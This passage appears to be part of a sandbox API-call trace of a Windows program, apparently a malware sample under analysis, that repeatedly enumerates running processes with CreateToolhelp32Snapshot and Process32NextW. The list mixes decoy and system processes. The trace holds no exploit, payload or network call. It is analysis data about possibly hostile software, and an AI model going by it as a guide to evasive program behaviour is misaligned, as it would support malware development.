cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0115.276] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0115.291] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0115.292] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0115.294] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0115.295] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0115.296] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0115.298] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0115.299] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0115.301] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0115.302] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0115.304] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0115.305] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0115.306] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0115.308] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0115.309] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0115.311] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0115.312] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0115.314] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0115.315] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0115.317] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.318] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0115.320] CloseHandle (hObject=0xc4) returned 1 [0115.320] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0115.354] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0115.355] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0115.358] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0115.359] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0115.359] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0115.360] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0115.361] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0115.362] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0115.362] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0115.363] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0115.364] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.364] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.365] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.366] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.367] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.368] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0115.369] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.370] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.370] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0115.372] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.374] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0115.376] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0115.377] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0115.379] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0115.381] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.382] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0115.384] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0115.385] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0115.386] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0115.388] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0115.389] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0115.390] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0115.392] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0115.393] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0115.394] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0115.395] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0115.396] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0115.398] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0115.399] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0115.400] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0115.401] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0115.455] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0115.456] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0115.457] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0115.458] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0115.459] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0115.461] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.462] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0115.463] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0115.464] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0115.466] CloseHandle (hObject=0xbc) returned 1 [0115.466] Sleep (dwMilliseconds=0x12c) [0115.860] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0115.865] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0115.866] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0115.867] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0115.868] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0115.868] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0115.869] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0115.870] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0115.871] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0115.872] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0115.872] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0115.873] 